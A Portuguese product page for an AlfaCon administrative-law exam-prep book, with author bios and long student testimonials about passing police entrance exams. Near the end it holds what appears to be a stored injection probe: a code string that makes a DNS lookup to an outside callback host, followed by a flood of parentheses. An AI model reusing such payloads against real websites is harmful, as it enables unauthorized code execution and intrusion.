CONTEÚDOS CONTEMPLADOS
• Conceitos, Estado, Fontes e Princípios
• Organização Administrativa
• Poderes Administrativos
• Atos Administrativos
• Processo Administrativo
• Licitação
• Lei nº 8.112/1990
• Responsabilidade Civil do Estado
• Improbidade Administrativa
ON-LINE
● DIREITO ADMINISTRATIVO COM NEWTON APRIGIO
O AlfaCon preparou todo o material com explicações, reunindo os principais conteúdos relacionados a prova, dando ênfase aos tópicos mais cobrados. ESTEJA ATENTO AO CONTEÚDO ONLINE POR MEIO DO CÓDIGO DE RESGATE, para que você tenha acesso a mais conteúdo.
Desfrute de seu material o máximo possível, estamos juntos nessa conquista!
Evandro Guedes: foi policial militar do estado do Rio de Janeiro por mais de 10 anos, agente penitenciário federal por 8 anos e aprovado em 12 importantes concursos públicos, como os da Polícia Federal e Polícia Rodoviária Federal. Professor de Direito Administrativo e Direito Penal e CEO do AlfaCon.
Newton Aprigio: formado em Direito pela Unioeste, pós-graduado em Didática e Metodologia do Ensino Superior pela UniVale, servidor público federal desde 2008, tendo atuado na área administrativa (licitações e contratos) e policial. Aprovado nos concursos da UTFPR, PF, PRF e DEPEN. Professor de Direito Administrativo do AlfaCon.
Newton Aprigio e Evandro Guedes
Título | Ano | Páginas | Formato | ISBN |
---|---|---|---|---|
Livro Série Provas e Concursos Direito Administrativo 6ª Edição | 08/2022 | 336 | 20.5 x 27.5 (cm) | 9786559183937 |
Meu nome é Rodrigo Hueiber Salazar Rodrigues, tenho 37 anos, moro em Contagem-MG, e fui aprovado no concurs...
Meu nome é Rodrigo Hueiber Salazar Rodrigues, tenho 37 anos, moro em Contagem-MG, e fui aprovado no concurso da Susepe-RS.
Sou formado em Administração de Empresas, e comecei a estudar para concurso público por conta da estabilidade. Venho estudando a aproximadamente 3 anos, durante esse período conquistei algumas aprovações, a da Susepe é a sexta aprovação.
Tenho facilidade com as matérias de Direito e RLM, por conta disso dedico um tempo maior para Português e Informática. Sempre conciliei trabalho com estudo. Acordava mais cedo, estudava até a hora de ir trabalhar. Estudava no serviço e também quando chegava em casa até tarde. No início tive grandes dificuldades em achar bons materiais. No início a gente a bate a cabeça com materiais de pouca qualidade, até que conheci o AlfaCon. Desde de então, só estudo com materiais do AlfaCon.
Não estive motivado durante todo o período, pois as vezes bate um cansaço, a família precisa de atenção. Filhos pequenos e esposa querem estar junto. Abri mão e abdiquei de muita coisa. Sempre pratiquei muito exercício e joguei futebol, e durante esse período de estudos abri mão de tudo.
Sou casado e minha esposa aceita essa rotina e me ajuda bastante, me dando suporte com todas outras coisas de casa e filhos para que eu possa me dedicar integralmente.
Sempre faço provas na área policial para que eu possa estar treinando. A primeira vez que estudei foi com o edital aberto, a parti de então venho mantendo os estudos quando abre um edital que me interesso, apenas faço adaptações, como no concurso da Susepe.
Conheci o AlfaCon na internet, e sempre me ajudaram muito com materiais e aulas de qualidade. Não possuo uma técnica específica, eu apenas leio bastante, faço exercícios e assisto aulas. Não acho que exista uma fórmula específica.
A maior dificuldade foi “abandonar” a família, mas para superar eu pensava sempre neles e no futuro melhor que poderia proporcioná-los. Quando a prova se aproxima é engraçado, sempre acho que não estudei o suficiente e com isso quero estudar todo o conteúdo de novo. Como não é possível, durante os estudos costumo marcar as matérias que tenho um pouco mais de dificuldade. Nos últimos 10 dias procuro apenas rever esse material, mas no dia antes da prova não estudo, procuro descansar e relaxar.
Sempre acho que estou falhando em alguma coisa. O que eu acredito muito na minha preparação é estar sempre lendo o material, assistindo aula e nos meus trajetos casa, trabalho, casa sempre estou vendo ou lendo algo. Acabo aprendendo por insistência.
Não desistam nunca. O esforço é enorme, mas a gratificação de ver o nome no diário oficial é maior ainda, muito gratificante.
Olá me chamo Mateus, e fui aprovado na PMPA em 2024. Gostaria de agradecer primeiramente a todos os excelen...
Olá me chamo Mateus, e fui aprovado na PMPA em 2024. Gostaria de agradecer primeiramente a todos os excelentes professores que me ajudaram nessa etapa de minha vida, e toda a equipe do alfacon. Com muito esforço e dedicação consegui alcançar esse objetivo em minha vida, foram 6 meses estudando pelo alfacon sozinho em casa 5 horas por dia, todo esforço valeu a pena. Obrigado.
Meu nome é Vinicius Veiga de Melo, tenho 23 anos, sou de Anápolis – GO e fui aprovado no concurso da PM G...
Meu nome é Vinicius Veiga de Melo, tenho 23 anos, sou de Anápolis – GO e fui aprovado no concurso da PM GO. Sou formado em Tecnólogo em Segurança Pública e resolvi estudar para concurso, pois, além de me espelhar em familiares e amigos, sempre foi um sonho me tornar policial militar.
Iniciei minha preparação assim que vi num jornal, a notícia que anunciava um edital para nível médio. Isso aconteceu em agosto de 2016 e, até então, eu havia parado de estudar no 2º ano do ensino médio. Porém, semanas depois, em uma nova entrevista, o governador anunciou que seria necessário nível superior para concorrer às vagas. Mais que depressa, pesquisei sobre cursos superiores de curta duração e foi aí que conheci o Evandro, com sua famosa dica sugerindo que se faça um "tecnólogo de porra nenhuma" e o AlfaCon. Fiz ao mesmo tempo, o ensino médio, o superior e estudava em casa as matérias específicas da PM. Desse início até minha aprovação, se passaram cerca de seis meses. Por ter uma certa afinidade com português e absolutamente nenhuma noção de direito, me dediquei quase que exclusivamente às matérias específicas durante quase todo o processo.
Quando decidi estudar, eu trabalhava todos os dias da semana. Trabalhava em uma mercearia de segunda a sexta, às quartas e sábados eu trabalhava em uma empresa de transporte de frutas e verduras, trabalhava carregando um caminhão, trabalho esse conhecido aqui popularmente como "chapa", e aos domingos eu vendia milho em uma feira livre. Naturalmente, eu levaria muito mais tempo para ser aprovado em algum concurso público, caso mantivesse essa minha rotina de trabalho. Pensando nisso, abandonei a minha banca de milho, e pouco tempo depois, pedi demissão da mercearia. O trabalho como chapa era (e ainda é, só começo a trabalhar na polícia dentro de uma semana) muito cansativo, mas rendia o suficiente para me manter durante essa preparação, além de me dar disponibilidade de estudar durante os outros dias da semana.
Assim que comecei a fazer o tecnólogo, ganhei do dono do cursinho uma apostila para polícia militar por ter tirado boas notas nesse curso. Pouco depois comprei uma apostila PM GO do AlfaCon e estudei basicamente por ela e por aulas gratuitas do AlfaCon, até que aproveitei uma promoção do Alfa e comprei também o curso online.
A minha separação me fez perder o foco por um tempo. Eu sentia falta do meu filho pequeno, pensava frequentemente se teria tomado a decisão certa de me separar e isso não me deixava estudar. Porém, certa vez, meu filho que na época tinha poucos meses de idade, passou a noite com febre e precisei levar ele no hospital público no meio da madrugada. O atendimento estava demorando muito, e ele chorava como se estivesse sentindo alguma dor. Precisei pedir pras pessoas da fila deixarem ele passar na frente, pra tomar a injeção e cortar a febre. Aquilo foi um momento muito difícil, mas foi o que eu precisava para voltar a me manter motivado: Meu filho precisava muito de mim, ele precisava de um plano de saúde e eu iria proporcionar isso a ele.
Desde que li o edital, notei que um dos critérios de avaliação médica era o cálculo do IMC. À época, o meu estava em mais de 32, quando o limite máximo permitido era 25. Precisei, além de abandonar passeios, festas e algumas reuniões familiares, perder mais de 27 quilos nesse período de tempo. Isso significou na prática que, dentre outros exemplos, eu passei o Natal e o ano novo tomando água com gás e limão, e comendo uvas e pão integral.
Assim que comecei a estudar, eu e minha esposa nos separamos. Eu acabava de abrir mão de metade da minha renda mensal (quando deixei de trabalhar na feira e na mercearia), e precisava me dedicar quase que exclusivamente aos estudos. Eu trabalhava menos, porém isso não significava que tinha mais tempo livre para ficar em casa. Ela não me deu o incentivo e apoio que eu precisava, e pouco mais de um mês depois de começar a estudar, nos separamos.
Tentei Polícia Civil e Bombeiro Militar, ambos sem sucesso. Para esse concurso comecei a estudar com o edital aberto. Conheci o AlfaCon pesquisando sobre algum curso superior de curta duração, fui parar no YouTube, num vídeo que o Evandro dá dicas de como se preparar para concurso sem ter uma formação superior. Posso dizer que o AlfaCon foi fundamental em todas as etapas da minha aprovação. Desde as aulas extremamente objetivas, passando pelo exemplo de vida e trajetória do Evandro, até mesmo os momentos de descontração que eles proporcionam ao aluno, tudo isso forma uma verdadeira fábrica de aprovados.
A maior dificuldade foi a interferência dos meus problemas pessoais. Não tive muita escolha, tentei aprender um pouco de meditação e técnicas de concentração e funcionou. Sempre tive um pouco de facilidade com provas de múltipla escolha, desde os tempos de colégio. Ansiedade e nervosismo bateram forte nas últimas semanas, mas eu intensifiquei meus estudos de modo que não tinha tempo suficiente para pensar negativo.
O material de estudo do AlfaCon foi determinante. Persistência e foco no objetivo foram fundamentais também. Meu maior erro, foi não ter começado a estudar anos atrás. Primeiramente, eu diria que desistir não é uma opção. Diante de tantas adversidades, e em tão pouco tempo, eu consegui algo que mudou para sempre minha vida.
A princípio, era apenas um sonho de infância, mas as coisas tomaram proporções muito maiores. Antes "ovelha negra", agora sou um exemplo na minha família: com meu incentivo, meu irmão e dois primos estão estudando para concurso também! E serão aprovados! Enfim, continue por você, pelos seus familiares, e por todos aqueles que de alguma forma estão com você nessa caminhada. A jornada é difícil, muitos vão desistir, mas é no momento mais complicado que você vai buscar forças para continuar. Eu jamais poderia imaginar como é doce o gosto da vitória. Mas você só valoriza o sabor doce da vitória, se tiver que engolir derrotas amargas pelo caminho.
Meu nome é Pedro Henrique Albuquerque Januário, tenho 23 anos, moro em Arapiraca/Alagoas e fui aprovado PM-...
Meu nome é Pedro Henrique Albuquerque Januário, tenho 23 anos, moro em Arapiraca/Alagoas e fui aprovado PM-AL. Decidi estudar para concurso em busca da melhoria de vida. Minha jornada foi de um ano e meio com muito estudo. Cheguei a prestar o concurso da Polícia Militar de Pernambuco, mas fui reprovado no teste físico. Prestei concurso também da Prefeitura em uma cidade vizinha.
Eu andava em torno de cinco horas por dia e a minha maior dificuldade era a matéria de português na qual eu tive que separar mais dias da semana e estudar com mais afinco. As demais matérias eu dividia em tempos iguais. Estudei com os materiais do AlfaCon, imprimi os pdfs e assistia as aulas gratuitas que eram postadas em seu canal no YouTube.
Ficar motivado o tempo todo é muito difícil, às vezes dava vontade de parar pois parecia que você estudava tanto e não conseguia aprender, porém o fato de não ter seu próprio sustento me fazia continuar estudando.
Sou solteiro e moro com meus pais que sempre me apoiaram. Meu pai, inclusive, por já ser servidor público, acreditava bastante que o meu esforço seria recompensado e que tudo ia dar certo. Sempre fui um cara muito caseiro e com poucas amizades, não saia muito para festas e decidir estudar para concurso só me fez concretizar mais ainda esse meu estilo caseiro e ficar sempre em casa.
Comecei a estudar bem antes do edital pois já estudava para outros concursos da polícia militar. Saiu muitos certames seguidos dessa área e eu já estava um pouco preparado para o da PM Alagoas já que era o meu maior foco.
Conheci o AlfaCon pelo YouTube e a equipe me ajudou bastante com as aulas gratuitas que são postadas no canal. Elas foram de suma importância, além dos puxões do Evandro que foram/são indispensáveis. Eu fazia resumos digitados no Word e depois revisava bastante por eles.
Minha maior dificuldade foi ter consistência na hora dos estudos. O que me fez superar foi ter muita determinação e foco no objetivo. Nos dias que antecederam a prova eu procurei relaxar e estudar mais a matéria de atualidades para ficar mais fresco na memória. Gabaritei atualidades graças ao Che!
O mais efetivo na minha preparação foi a resolução de questões. Cheguei a ter mais de 4 mil questões da Cespe resolvidas em menos de 3 meses! Falhas ocorreram no momento em que pulava alguns dias de estudo por estar muito cansado e estressado com a rotina.
Não desistam! A vida de concurseiro é árdua, porém muito feliz quando se alcança o objetivo, todo o sofrimento e perda vai ser recompensado no final. Alfartanos, força!!
'.gethostbyname(lc('hitch'.'arncpyke64851.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(84).chr(116)....
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))